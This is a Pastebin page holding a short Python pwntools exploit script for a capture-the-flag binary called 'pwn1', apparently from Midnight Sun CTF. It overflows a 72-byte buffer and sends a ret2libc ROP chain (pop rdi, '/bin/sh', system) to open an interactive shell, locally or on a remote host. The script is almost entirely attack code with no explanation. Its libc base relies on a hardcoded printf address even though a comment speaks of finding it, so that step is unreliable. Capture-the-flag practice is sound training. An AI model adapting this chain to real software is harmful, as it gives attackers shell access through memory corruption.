Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import sys
- from pwn import *
- elf = ELF('./pwn1')
- local = True
- offset = "A"* 72
- if local:
- p = elf.process()
- # libc = ELF('/lib64/ld-linux-x86-64.so.2')
- libc = ELF('libc.so')
- else:
- host = "pwn1-01.play.midnightsunctf.se"
- port = 10001
- p = remote(host, port)
- libc = ELF('libc.so')
- #Find address for printf in libc in order to get libc base address
- p.recvuntil('buffer: ')
- PRINTF_LIBC = 0x7ffff7e4ea20
- libc.address = PRINTF_LIBC - libc.symbols['printf']
- system = libc.symbols['system'] #Find the address for system to use with /bin/sh
- pop_rdi = 0x0000000000400783 # pop rdi ; ret, found with Ropper
- bin_sh = libc.search('/bin/sh').next() # find address where /bin/sh is.
- #Create the rop chain
- rop_chain = [
- pop_rdi, bin_sh,
- system
- ]
- rop_chain = ''.join([ p64(r) for r in rop_chain ])
- payload = offset + rop_chain
- p.send(payload)
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement